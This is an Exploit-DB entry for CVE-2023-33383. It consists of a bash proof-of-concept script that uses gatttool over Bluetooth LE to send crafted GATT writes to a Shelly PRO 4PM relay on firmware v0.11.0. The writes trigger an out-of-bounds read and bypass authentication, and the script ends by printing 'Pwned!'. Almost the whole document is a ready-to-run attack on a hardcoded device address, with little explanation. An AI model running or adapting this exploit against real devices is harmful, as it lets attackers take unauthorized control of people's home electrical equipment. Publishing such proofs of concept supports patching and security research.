Shelly PRO 4PM v0.11.0 - Authentication Bypass

EDB-ID:

51657


Platform:

Hardware

Date:

2023-08-04


#!/bin/bash

# Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass
# Google Dork: NA
# Date: 2nd August 2023
# Exploit Author: The Security Team [exploitsecurity.io]
# Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability
# Vendor Homepage: https://www.shelly.com/
# Software Link: NA
# Version: Firmware v0.11.0 (REQUIRED)
# Tested on: MacOS/Linux
# CVE : CVE-2023-33383

IFS=
failed=$false
RED="\e[31m"
GREEN="\e[92m"
WHITE="\e[97m"
ENDCOLOR="\e[0m"
substring="Connection refused"


banner()
    {
        clear
        echo -e "${GREEN}[+]*********************************************************[+]"
        echo -e "${GREEN}|   Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}]              |"
        echo -e "${GREEN}|   Description: Shelly PRO 4PM - Out of Bounds              |"
        echo -e "${GREEN}|   CVE: CVE-2023-33383                                      |"
        echo -e "${GREEN}[+]*********************************************************[+]"
        echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}"
    }

banner
read -s -n 1 key
if [ "$key" = "x" ]; then
    exit 0;
elif [ "$key" = "" ]; then
    gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary)
    if [ -z "$gattout" ]; then
        echo -e "${RED}Connection timed out${ENDCOLOR}"
        exit 0;
    else
    sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1
    echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}"
    sleep 1
    if [ $? -eq 1 ]; then
       $failed=$true
       exit 0;
    fi
    sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1
    sleep 1
    if [ $? -eq 1 ]; then
        $failed=$true
        echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"
        exit 0;
    else
       sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1
       sleep 1
       for i in {1..5}
       do
          echo -ne "${GREEN}."
          sleep 1
       done
       echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}"
    fi
fi
fi